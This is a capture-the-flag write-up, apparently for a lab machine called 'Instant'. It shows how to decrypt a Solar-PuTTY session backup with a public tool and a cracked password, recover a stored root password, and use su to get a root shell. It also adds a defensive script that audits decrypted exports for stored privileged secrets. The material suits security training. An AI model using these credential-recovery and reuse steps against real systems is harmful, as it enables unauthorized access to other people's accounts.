Solar-PuTTY Session Decrypt
A saved Solar-PuTTY session backup was identified at /opt/backup/Solar-PuTTY/sessions-backup.dat. The export is encrypted with a user-chosen password, and a decryptor (VoidSec's SolarPuttyDecrypt) is available online.
PS C:\Users\tacticalgator\source> cd .\repos\
PS C:\Users\tacticalgator\source\repos> git clone https://github.com/VoidSec/SolarPuttyDecrypt
Cloning into 'SolarPuttyDecrypt'...
remote: Enumerating objects: 32, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 32 (delta 0), reused 0 (delta 0), pack-reused 28 (from 1)
Receiving objects: 100% (32/32), 79.79 KiB | 809.00 KiB/s, done.
Resolving deltas: 100% (6/6), done.
PS C:\Users\tacticalgator\source\repos> start .\SolarPuttyDecrypt\SolarPuttyDecrypt.sln
Cloning the decryptor and opening the solution in Visual Studio, then building the Release configuration
Build complete
PS C:\Users\tacticalgator\source\repos\SolarPuttyDecrypt\SolarPuttyDecrypt\bin\Release> .\SolarPuttyDecrypt.exe sessions-backup.dat estrella
-----------------------------------------------------
SolarPutty's Sessions Decrypter by VoidSec
-----------------------------------------------------
{
"Sessions": [
{
"Id": "066894ee-635c-4578-86d0-d36d4838115b",
"Ip": "10.10.11.37",
"Port": 22,
"ConnectionType": 1,
"SessionName": "Instant",
"Authentication": 0,
"CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04",
"AuthenticateScript": "00000000-0000-0000-0000-000000000000",
"LastTimeOpen": "0001-01-01T00:00:00",
"OpenCounter": 1,
"SerialLine": null,
"Speed": 0,
"Color": "#FF176998",
"TelnetConnectionWaitSeconds": 1,
"LoggingEnabled": false,
"RemoteDirectory": ""
}
],
"Credentials": [
{
"Id": "452ed919-530e-419b-b721-da76cbe8ed04",
"CredentialsName": "instant-root",
"Username": "root",
"Password": "12**24nzC!r0c%q12",
"PrivateKeyPath": "",
"Passphrase": "",
"PrivateKeyContent": null
}
],
"AuthScript": [],
"Groups": [],
"Tunnels": [],
"LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs"
}
-----------------------------------------------------
[+] DONE Decrypted file is saved in: C:\Users\tacticalgator\Desktop\SolarPutty_sessions_decrypted.txt
Decrypting the saved session backup with the cracked web API password of the shirohige user (estrella) reveals the credential of the root account: 12**24nzC!r0c%q12
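Once an export like the one above has been decrypted, the useful defensive question is which saved sessions carry stored secrets for privileged accounts. The following is an added example (not part of this writeup or VoidSec's tool) that joins Sessions to Credentials by CredentialsID in the JSON layout shown above and reports what each one stores without echoing the secret; the sample export is constructed with placeholder values.

```python
import json

# Constructed sample in the layout of the decrypted Solar-PuTTY export above.
# Values are placeholders, not data from the compromised host.
SAMPLE_EXPORT = """
{
  "Sessions": [
    {"Id": "s-1", "Ip": "10.0.0.5", "Port": 22, "ConnectionType": 1,
     "SessionName": "prod-db", "Authentication": 0, "CredentialsID": "c-1"},
    {"Id": "s-2", "Ip": "10.0.0.6", "Port": 22, "ConnectionType": 1,
     "SessionName": "jump", "Authentication": 0, "CredentialsID": "c-2"},
    {"Id": "s-3", "Ip": "10.0.0.7", "Port": 23, "ConnectionType": 2,
     "SessionName": "switch", "Authentication": 0,
     "CredentialsID": "00000000-0000-0000-0000-000000000000"}
  ],
  "Credentials": [
    {"Id": "c-1", "CredentialsName": "db-root", "Username": "root",
     "Password": "placeholder-secret", "PrivateKeyPath": "",
     "Passphrase": "", "PrivateKeyContent": null},
    {"Id": "c-2", "CredentialsName": "jump-key", "Username": "ops",
     "Password": "", "PrivateKeyPath": "ops.ppk",
     "Passphrase": "", "PrivateKeyContent": null}
  ],
  "AuthScript": [], "Groups": [], "Tunnels": []
}
"""


def audit_export(text):
    """Return one finding per session that references a stored credential.
    Each finding names the target, the account, and which kinds of secret
    material are held in the export (the secret itself is never returned)."""
    data = json.loads(text)
    creds = {c["Id"]: c for c in data.get("Credentials", [])}
    findings = []
    for s in data.get("Sessions", []):
        c = creds.get(s.get("CredentialsID"))
        if c is None:  # session has no saved credential (e.g. nil GUID)
            continue
        stored = [kind for field, kind in (("Password", "password"),
                                          ("PrivateKeyContent", "private-key"),
                                          ("Passphrase", "key-passphrase"))
                  if c.get(field)]
        findings.append({
            "session": s["SessionName"],
            "target": "%s:%s" % (s["Ip"], s["Port"]),
            "username": c.get("Username"),
            "privileged": c.get("Username") == "root",
            "stored_secrets": stored,
        })
    return findings
```

Run over a real decrypted export, a finding with "privileged": True and "password" in stored_secrets is exactly the case this writeup abused: a root password recoverable by anyone who obtains the backup and its export password.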
shirohige@instant:/$ su root
Password:
root@instant:/# whoami
root
root@instant:/# hostname
instant
root@instant:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:58:54 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.210.105/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2988sec preferred_lft 2988sec
inet6 dead:beef::250:56ff:fe94:5854/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe94:5854/64 scope link
valid_lft forever preferred_lft forever
System Level Compromise